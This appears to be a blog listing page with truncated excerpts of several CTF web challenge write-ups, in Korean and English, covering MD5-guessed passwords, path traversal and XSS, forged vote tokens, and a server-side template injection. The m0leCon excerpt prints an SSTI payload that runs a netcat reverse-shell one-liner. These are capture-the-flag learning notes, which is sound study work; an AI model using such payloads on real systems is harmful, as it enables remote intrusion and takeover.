i love cat
as3617
SSTF CTF 2020 Web - Migration
Migration 두 개의 링크를 주고 있다. http://migration.sstf.site:5555/ http://migration.sstf.site:7777/ 첫번째 링크에는 register가 포함되있고 두번째 링크는 로그인 후 admin 페이지를 제공해준다. 문제에서 주어진 파일을 보면 user의 정보를 포함하고 있는데 아래와 같이 이루어져 있다. idx user_id password 1 user1 c4ca4238a0b923820dcc509a6f75849b 2 user2 c81e728d9d4c2f636f067f89cc14862c 이때 password는 md5해쉬로 이루어져 있었고 user1의 password가 1인걸로 봐선 나머지 유저의 password도 id에 붙어있는 숫자라는 것을 추측해낼 수..
m0leCon CTF 2020 Teaser Web Writeup
ascii-inbox The problem is giving two websites. 1.https://challs.m0lecon.it:8003/ - Inbox 2.https://challs.m0lecon.it:8004/ - Ascii The discription gave me 404 pages as a hint. I immediately thought of a ssti and tried an attack. I tried reverse shell and I could get shell. https://challs.m0lecon.it:8004/{{url_for.__globals__.os.popen('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip por..
CONfidenceCTF Web writeup - Cat web
문제에 들어가면 귀여운 고양이 사진이 보인다. 일단 소스코드를 확인해보면 black grey red white not like sumthing? send it hier 위와 같이 코드가 되있는데 나는 http://catweb.zajebistyc.tf/cats?kind=이부분이 수상해보였고 접속해보니 다음과 같았다. kind 파라미터 값에 따라서 json형식으로 사진파일이름을 전달해주는 것 같았다. 아무거나 넣어보고 있었는데 ?kind=/형식으로 전달해주니 내부 디렉토리를 보는 것이 가능했다. 플래그는 templates폴더 내부에 존재했지만 flag.txt에 접근하는 것은 안됬다(404가 뜬다) 문제에서 보면 report기능이 있는 것으로 봐서 xss문제라고 생각했고 json형식으로 값이 전달될 때 우리가..
Christmas CTF web writeup
어제 크리스마스 CTF에 팀을 구성하여 참여하여 10등으로 마무리하였다. web - watermelon upload music을 통해 파일을 업로드 할 수 있지만 딱히 업로드를 통해서 할 수 있는 것은 없다. robots.txt를 통해 /xmas/.git에 접근 할 수 있었고 이를 통해 깃헙에 소스코드가 존재할 것이라 생각하여 검색을 하였더니 소스코드가 진짜 있었다. 소스코드를 분석해보면 음악을 업로드 한뒤 투표창에서 투표를 일정이상 받으면 바로 플래그를 준다. 하지만 투표는 계정당 한번 밖에 할 수가 없다. 따라서 토큰 값을 생성해서 다른 user_no로 투표를 하면 된다. import hashlib, base64, requests def send(a): URL = "http://ch4n3.me:808..
